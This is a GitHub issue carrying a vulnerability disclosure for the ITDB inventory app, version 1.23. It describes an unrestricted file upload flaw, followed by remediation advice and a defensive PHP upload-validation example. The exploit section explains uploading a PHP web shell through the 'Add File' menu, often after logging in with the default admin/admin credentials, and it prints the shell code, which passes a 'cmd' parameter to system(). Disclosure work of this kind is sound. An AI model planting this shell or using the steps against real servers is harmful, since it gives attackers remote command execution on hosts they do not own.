sivann / itdb

IT Items Database
http://www.sivann.gr/software/itdb/
GNU General Public License v3.0

I Found The Security Issue #69

Open rungga opened 7 years ago

rungga commented 7 years ago

Hey Sivann,

I found the security issue / vulnerability on ITDB application. I have sent Proof of Concept to your email "sivann@gmail.com".

is it possible if I post the vulnerability in here?

rungga commented 7 years ago

PoC ITDB - Unrestricted File Upload.pdf

Exploit Title: Unrestricted File Upload Vulnerability on ITDB (IT ITems DataBase) Application
Date: Sept 07th, 2017
Exploit Author: @rungga_reksya
Vendor Homepage: http://www.sivann.gr/software/itdb/
Software Link: https://github.com/sivann/itdb/archive/master.zip
Version: 1.23
Tested on: Windows Server 2008 R2
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)

I. Application Background: ITDB is a web based asset inventory management tool used to store information about assets found in office environments, with a focus -but not limited to- IT assets. It is not or targets for ITIL/CMDB compliance (yet), but it has served me for years and hopefully it will do the same for you :-) ITDB comes with sources and is distributed under the GNU Public license.

II. Vulnerability Description: An unrestricted file upload vulnerability in the “Add File” menu of ITDB version 1.23 allows an authenticated user whose account type is “Full Access” or “Read” to upload malicious code (a shell) with the “php” extension.

III. Exploit: If we refer to the file “00-INSTALL.txt”, the default username and password are “admin/admin”. Example: the attacker has admin privilege and logs in as admin to the ITDB application. Then the attacker accesses the “Add File” menu, uploads the shell file (shellcmd.php), and clicks Save —> Bingo Success

Directory Listing at “http://target.com/itdb-directory/data/files/”

Check your shell on field “Filename” and access your shell like this: http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami

script for shellcmd.php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

======

IV. Remediation: Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded. (source: https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)

Content-type Verification: This kind of verification completely depends upon content-type header, e.g. Content-Type: image/jpeg, containing the MIME type. This is a very weak validation mechanism, as this header is supplied by the user or attacker. (source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

V. Proof of Concept:

Admin Privilege (Full Access)

[PoC screenshots 1-4 (Full Access account); images not included in this text]

Low User (Read Only)

[Five PoC screenshots taken 2017-09-08 (Read Only account); images not included in this text]
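As an added illustration of the remediation steps in section IV (this is not ITDB's own code, nor code from the reporter), the following PHP upload handler applies an extension allowlist to every dotted segment of the name (so `shell.php.png` is rejected), refuses dot-prefixed names such as `.htaccess`, sniffs the real content instead of trusting the client's Content-Type header, and discards the user-supplied name in favour of a random one. The function name, the allowlist and the `data/files` destination are assumptions for illustration.

```php
<?php
// Added example, not part of ITDB: allowlist-based upload validation.
// Maps each permitted extension to the MIME type its content must sniff as.
const ALLOWED_EXT = [
    'pdf' => 'application/pdf', 'png' => 'image/png',
    'jpg' => 'image/jpeg',      'jpeg' => 'image/jpeg',
];

// Validates and stores an uploaded file; returns the new stored filename,
// or throws RuntimeException when any check fails.
function store_upload(string $originalName, string $tmpPath, string $destDir): string
{
    $base = basename($originalName);
    // Reject empty names and dotfiles (.htaccess, .user.ini, ...).
    if ($base === '' || $base[0] === '.') {
        throw new RuntimeException('Rejected: empty or dot-prefixed filename');
    }
    // Every segment after the first dot must be allowlisted, so a double
    // extension like "shell.php.png" fails on "php" despite ending in "png".
    $parts = explode('.', strtolower($base));
    array_shift($parts);                  // drop the stem
    if ($parts === []) {
        throw new RuntimeException('Rejected: no extension');
    }
    foreach ($parts as $ext) {
        if (!array_key_exists($ext, ALLOWED_EXT)) {
            throw new RuntimeException("Rejected: extension '$ext' not allowed");
        }
    }
    $ext = end($parts);
    // Sniff the bytes on disk; the request's Content-Type header is attacker-controlled.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected !== ALLOWED_EXT[$ext]) {
        throw new RuntimeException("Rejected: content is $detected, expected " . ALLOWED_EXT[$ext]);
    }
    // Never reuse the client's name: random stem plus the verified extension.
    $safeName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($destDir, '/') . '/' . $safeName;
    if (!move_uploaded_file($tmpPath, $dest)) {
        throw new RuntimeException('Failed to move uploaded file');
    }
    chmod($dest, 0644);                   // readable, never executable
    return $safeName;
}

// Usage inside the "Add File" handler (assumes the form field is named "file"):
// $stored = store_upload($_FILES['file']['name'], $_FILES['file']['tmp_name'], __DIR__ . '/data/files');
```

The code-level checks complement, not replace, the web-server setting from section IV: the upload directory should also be configured so the server never hands its contents to the PHP interpreter.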